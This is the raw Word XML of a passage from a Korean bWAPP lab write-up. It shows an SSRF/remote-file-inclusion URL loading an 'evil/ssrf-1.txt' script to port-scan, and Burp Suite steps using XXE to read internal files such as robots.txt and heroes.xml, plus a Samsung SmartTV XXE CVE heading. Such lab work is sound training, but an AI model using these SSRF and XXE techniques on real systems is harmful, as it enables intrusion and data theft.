            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://172.30.1.10/bWAPP/rlfi.php?language=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F423024" w14:textId="6C2333EC" w:rsidR="00671AE2" w:rsidRPr="0035631E" w:rsidRDefault="00235628" w:rsidP="00E00869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 xml:space="preserve">[ </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://비박스</w:t>
        </w:r>
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>p/evil/ssrf-1.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ]&amp;action=go[&amp;ip=</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>비박스i</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46A607" w14:textId="6A11957E" w:rsidR="00235628" w:rsidRPr="0035631E" w:rsidRDefault="00B25403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3FA1005B" wp14:editId="33F2589E">
            <wp:extent cx="6840001" cy="2931149"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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93114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ED9E4B" w14:textId="2D11BFF8" w:rsidR="00235628" w:rsidRPr="0035631E" w:rsidRDefault="00B25403" w:rsidP="00E00869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코드가 성공하면 경고 구문이 뜨고 확인을 누르면 위와 같이 포트 스캔에 성공한 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE4E95" w14:textId="63197A86" w:rsidR="00B25403" w:rsidRPr="0035631E" w:rsidRDefault="00B25403" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69444523" w14:textId="00E53311" w:rsidR="00192F22" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00B25403">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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>Access resources on the internal network using XXE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E630F" w14:textId="398CA1E8" w:rsidR="00B25403" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00192F22">
      <w:pPr>
        <w:ind w:left="400"/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>-</w:t>
      </w:r>
      <w:r w:rsidR="00B25403" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00B25403" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r w:rsidR="00B25403" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>를 이용한 내부망 자원 접근(bWAPP 내부망에 다른 시스템이 없기 때문에 bWAPP을 타겟으로 실시함)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687ADB2" w14:textId="091B46CB" w:rsidR="00F43C2F" w:rsidRPr="0035631E" w:rsidRDefault="00F43C2F" w:rsidP="00F43C2F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7677984F" w14:textId="32F08FBD" w:rsidR="00F43C2F" w:rsidRPr="0035631E" w:rsidRDefault="007A3FAB" w:rsidP="00F43C2F">
      <w:pPr>
        <w:jc w:val="left"/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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34191ED5" wp14:editId="7C7125F2">
            <wp:extent cx="6840001" cy="2005729"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="139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200572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451E87" w14:textId="5A389CD2" w:rsidR="007A3FAB" w:rsidRPr="0035631E" w:rsidRDefault="007A3FAB" w:rsidP="00F43C2F">
      <w:pPr>
        <w:jc w:val="left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첫 페이지로 돌아가 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">Access </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>링크를 클릭하면</w:t>
      </w:r>
      <w:r w:rsidR="00A069B2" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 두 번째 시나리오를 진행할 수 있는 </w:t>
      </w:r>
      <w:r w:rsidR="00A069B2" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 소스코드가 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478493F1" w14:textId="612F7FA9" w:rsidR="00051F53" w:rsidRPr="0035631E" w:rsidRDefault="00051F53" w:rsidP="00051F53">
      <w:pPr>
        <w:jc w:val="left"/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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00F172BC" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F172BC" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드를 복사해 놓은 뒤 S</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">QL injection – Stored(XML) </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시나리오로 이동한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADE51A" w14:textId="053ADE88" w:rsidR="00F172BC" w:rsidRPr="0035631E" w:rsidRDefault="00F172BC" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E77B0D8" w14:textId="67EF9BE7" w:rsidR="00F172BC" w:rsidRPr="0035631E" w:rsidRDefault="00F172BC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515413C2" wp14:editId="348389F4">
            <wp:extent cx="6840001" cy="2080915"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1460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080915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3CDEE2" w14:textId="0F91E841" w:rsidR="00F172BC" w:rsidRPr="0035631E" w:rsidRDefault="00F172BC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Burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 i</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ntercept </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">상태로 준비한 뒤 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>‘Any bugs’</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 클릭하여 패킷을 넘겨준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87CEF7" w14:textId="77777777" w:rsidR="003E6206" w:rsidRPr="0035631E" w:rsidRDefault="003E6206" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373080C8" w14:textId="629DF383" w:rsidR="00F172BC" w:rsidRPr="0035631E" w:rsidRDefault="00F172BC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5D53A1B0" wp14:editId="69B6615E">
            <wp:extent cx="6840001" cy="4988700"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2159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98870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93E0B3" w14:textId="050AAE23" w:rsidR="00F172BC" w:rsidRPr="0035631E" w:rsidRDefault="00F172BC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마우스 우클릭 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; ‘Send to Repeater’ </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">클릭 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00497CA0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497CA0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00497CA0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">eapeater </w:t>
      </w:r>
      <w:r w:rsidR="00497CA0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭 및 이동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E699" w14:textId="2B9F4FCE" w:rsidR="00497CA0" w:rsidRPr="0035631E" w:rsidRDefault="00497CA0" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA91960" w14:textId="52360D35" w:rsidR="008B778F" w:rsidRPr="0035631E" w:rsidRDefault="008B778F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2497F705" wp14:editId="2B1DA791">
            <wp:extent cx="6840001" cy="4028451"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1016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402845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82C4B5" w14:textId="1CD4C3E7" w:rsidR="00497CA0" w:rsidRPr="0035631E" w:rsidRDefault="00497CA0" w:rsidP="00497CA0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기존 Request Body를 지우고 복사해 놓은</w:t>
      </w:r>
      <w:r w:rsidR="008B778F" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B778F" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="008B778F" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 스크립트를 삽입</w:t>
      </w:r>
      <w:r w:rsidR="003E6206" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">한 뒤 </w:t>
      </w:r>
      <w:r w:rsidR="003E6206" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>‘Send’</w:t>
      </w:r>
      <w:r w:rsidR="003E6206" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 눌러 넘겨준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2954B566" w14:textId="57B691ED" w:rsidR="00497CA0" w:rsidRPr="0035631E" w:rsidRDefault="00497CA0" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12090B2A" w14:textId="541BD343" w:rsidR="003E6206" w:rsidRPr="0035631E" w:rsidRDefault="003E6206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02E2B507" wp14:editId="4FE2E025">
            <wp:extent cx="6840001" cy="1842797"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2413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842797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84A328" w14:textId="02BF73BB" w:rsidR="003E6206" w:rsidRPr="0035631E" w:rsidRDefault="003E6206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Response에서 'robots.txt'의 내용을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C78535" w14:textId="524E058B" w:rsidR="003E6206" w:rsidRPr="0035631E" w:rsidRDefault="003E6206" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16377450" w14:textId="56FCAF8F" w:rsidR="003E6206" w:rsidRPr="0035631E" w:rsidRDefault="00DD0298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36E7EA60" wp14:editId="1D4874E2">
            <wp:extent cx="6840001" cy="1516878"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2667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51687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090479" w14:textId="41CE2992" w:rsidR="00497CA0" w:rsidRPr="0035631E" w:rsidRDefault="00CF606D" w:rsidP="00051F5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이번에는 </w:t>
      </w:r>
      <w:r w:rsidR="00DD0298" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">복사한 </w:t>
      </w:r>
      <w:r w:rsidR="00DD0298" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="00DD0298" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidR="00DD0298" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00DD0298" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 코드를 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Request body</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 넣고 넘겨주면 B</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ase64</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 인코딩된 내용이 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A3DBA" w14:textId="3D9EBAD9" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="00051F53">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175B6BEC" w14:textId="2F413962" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="009678B1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lastRenderedPageBreak/>
        <w:t>인코딩된 내용을 복사하여 B</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>urp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 D</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ecoder </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>탭으로 이동하여 내용을 붙여넣고 디코딩해 준다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74432C9B" w14:textId="3A8BD62A" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Decoder -&gt; decode as Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60236764" w14:textId="0D275F9E" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="009678B1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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388A4C85" wp14:editId="1B9AAA3C">
            <wp:extent cx="6840001" cy="1197311"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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197311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7F4A1C" w14:textId="37C23E77" w:rsidR="009678B1" w:rsidRPr="0035631E" w:rsidRDefault="003C7EE5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디코딩되면 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>heroes.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 내용을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D927B" w14:textId="77777777" w:rsidR="003C7EE5" w:rsidRPr="0035631E" w:rsidRDefault="003C7EE5" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108F670F" w14:textId="6B7BE016" w:rsidR="00192F22" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00192F22">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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 xml:space="preserve">Crash my Samsung SmartTV (CVE-2013-4890) using XXE </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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508A55" w14:textId="2D42DD30" w:rsidR="00192F22" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00192F22">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="760"/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>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>를 이용한 삼성</w:t>
      </w:r>
      <w:r w:rsidR="007831E4" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>스마트T</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">V </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC95AD0" w14:textId="58F64A7F" w:rsidR="00192F22" w:rsidRPr="0035631E" w:rsidRDefault="007831E4" w:rsidP="00192F22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</w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
